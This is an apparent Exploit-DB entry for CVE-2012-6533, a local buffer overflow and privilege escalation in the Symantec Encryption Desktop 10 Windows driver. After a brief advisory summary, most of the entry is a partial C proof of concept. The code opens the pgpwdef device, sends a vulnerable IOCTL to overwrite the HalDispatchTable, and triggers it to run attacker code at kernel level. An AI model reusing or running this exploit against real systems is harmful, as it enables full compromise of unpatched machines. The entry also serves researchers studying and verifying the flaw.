Symantec Encryption Desktop 10 - Local Buffer Overflow / Local Privilege Escalation

EDB-ID:

38299

CVE:

2012-6533

EDB Verified:

Author:

Nikita Tarakanov

Type:

local

Exploit: /

Platform:

Windows

Date:

2012-02-25

Vulnerable App:

source: https://www.securityfocus.com/bid/57835/info

Symantec Encryption Desktop is prone to a local buffer-overflow vulnerability. 

A local attacker may exploit this issue to execute arbitrary code with escalated privileges.

#define IO_CONTROL_VULN 0x80022058
 
#define TARGET_DEVICE L"\\Device\\pgpwdef"
 
[..]
 
    usName.Buffer = TARGET_DEVICE;
    usName.Length = usName.MaximumLength = 
(USHORT)(wcslen(usName.Buffer) * sizeof(WCHAR));
 
    InitializeObjectAttributes(&ObjAttr, &usName, OBJ_CASE_INSENSITIVE , 
NULL, NULL);    
 
 
    // get handle of target devide
    ns = f_NtOpenFile(
        &hDev,
        FILE_READ_DATA | FILE_WRITE_DATA | SYNCHRONIZE,
        &ObjAttr,
        &StatusBlock,
        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
        FILE_SYNCHRONOUS_IO_NONALERT
    );
 
[..]
 
    BOOL bStatus = DeviceIoControl(
        hDev,
        IO_CONTROL_VULN,
        InBuff, 0x8,
        OutBuff, 0x8,
        &dwReturnLen, NULL
    );
 
    dwReturnLen = 0;
    bStatus = DeviceIoControl(
        hDev,
        IO_CONTROL_VULN,
        InBuff, sizeof(PVOID),
        (PUCHAR)m_HalDispatchTable, 0,
        &dwReturnLen, NULL
    );
 
[..]
 
    f_NtQueryIntervalProfile(ProfileTotalIssues, &Interval);
 
[..]
 
Your evil code processes with CPL==0

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services